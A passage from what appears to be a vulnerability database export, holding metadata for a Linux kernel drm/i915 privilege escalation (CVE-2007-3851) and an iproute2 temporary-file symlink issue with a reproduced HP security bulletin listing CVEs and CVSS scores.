        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4997"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1669"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1375"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4573"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4997"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3740"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1669"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1375"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/security/kernelupdate"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "PACKETSTORM",
        "id": "59004"
      },
      {
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "db": "PACKETSTORM",
        "id": "58639"
      },
      {
        "db": "PACKETSTORM",
        "id": "66584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "PACKETSTORM",
        "id": "59004"
      },
      {
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "db": "PACKETSTORM",
        "id": "58639"
      },
      {
        "db": "PACKETSTORM",
        "id": "66584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-08-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "date": "2007-08-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "date": "2007-08-09T00:00:00",
        "db": "BID",
        "id": "25263"
      },
      {
        "date": "2007-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "date": "2007-09-01T04:09:47",
        "db": "PACKETSTORM",
        "id": "59004"
      },
      {
        "date": "2007-08-31T17:03:00",
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "date": "2007-08-16T08:55:55",
        "db": "PACKETSTORM",
        "id": "58639"
      },
      {
        "date": "2008-05-22T05:14:01",
        "db": "PACKETSTORM",
        "id": "66584"
      },
      {
        "date": "2007-08-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "date": "2007-08-13T19:17:00",
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "date": "2017-09-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "date": "2008-05-21T20:34:00",
        "db": "BID",
        "id": "25263"
      },
      {
        "date": "2007-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "date": "2007-10-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "date": "2017-09-29T01:29:08.157000",
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  drm/i915 Elevation of privilege vulnerability in components",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      }
    ],
    "trust": 0.6
  }
}

var-201402-0055
Vulnerability from variot

iproute2 before 3.3.0 allows local users to overwrite arbitrary files via a symlink attack on a temporary file used by (1) configure or (2) examples/dhcp-client-script. Linux Kernel is prone to multiple insecure temporary file-creation vulnerabilities in the 'iproute' package. An attacker with local access could potentially exploit these issues to perform symbolic-link attacks. Successfully mounting a symbolic attack may allow the attacker to delete or modify sensitive files. Other attacks may also be possible. iproute2 is a series of toolkits for traffic control on TCP/IP networks in Linux systems maintained by American software developer Stephen Hemminger. The toolkit includes the following components, ifconfig, route, tc, ip. A security vulnerability exists in iproute2 3.2.0 and earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04135307

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04135307 Version: 1

HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-03-10 Last Updated: 2014-03-10

Potential Security Impact: Multiple remote vulnerabilities affecting confidentiality, integrity and availability

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability.

References: CVE-2010-4008 CVE-2010-4494 CVE-2011-2182 CVE-2011-2213 CVE-2011-2492

CVE-2011-2518 CVE-2011-2689 CVE-2011-2723 CVE-2011-3188 CVE-2011-4077

CVE-2011-4110 CVE-2012-0058 CVE-2012-0879 CVE-2012-1088 CVE-2012-1179

CVE-2012-2137 CVE-2012-2313 CVE-2012-2372 CVE-2012-2373 CVE-2012-2375

CVE-2012-2383 CVE-2012-2384 CVE-2013-6205 CVE-2013-6206 SSRT101443

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Rapid Deployment Pack (RDP) -- All versions HP Insight Control Server Deployment -- All versions

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2013-6205 (AV:L/AC:M/Au:S/C:P/I:P/A:P) 4.1 CVE-2013-6206 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0 CVE-2010-4008 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2010-4494 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-2182 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2011-2213 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2492 (AV:L/AC:M/Au:N/C:P/I:N/A:N) 1.9 CVE-2011-2518 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2689 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2723 (AV:A/AC:M/Au:N/C:N/I:N/A:C) 5.7 CVE-2011-3188 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-4077 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2011-4110 (AV:L/AC:L/Au:N/C:N/I:N/A:P) 2.1 CVE-2012-0058 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-0879 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-1088 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2012-1179 (AV:A/AC:M/Au:S/C:N/I:N/A:C) 5.2 CVE-2012-2137 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2313 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2012-2372 (AV:L/AC:M/Au:S/C:N/I:N/A:C) 4.4 CVE-2012-2373 (AV:L/AC:H/Au:N/C:N/I:N/A:C) 4.0 CVE-2012-2375 (AV:A/AC:H/Au:N/C:N/I:N/A:C) 4.6 CVE-2012-2383 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-2384 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment should only be run on private secure networks to prevent the risk of security compromise.

HISTORY Version:1 (rev.1) - 10 March 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlMd70EACgkQ4B86/C0qfVnXowCgnnw+HySvDNjCV7VPwZHplLwc Gw4An38h3204bsbLQN/gJQVEqFTo5IfX =sWmR -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201402-0055",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
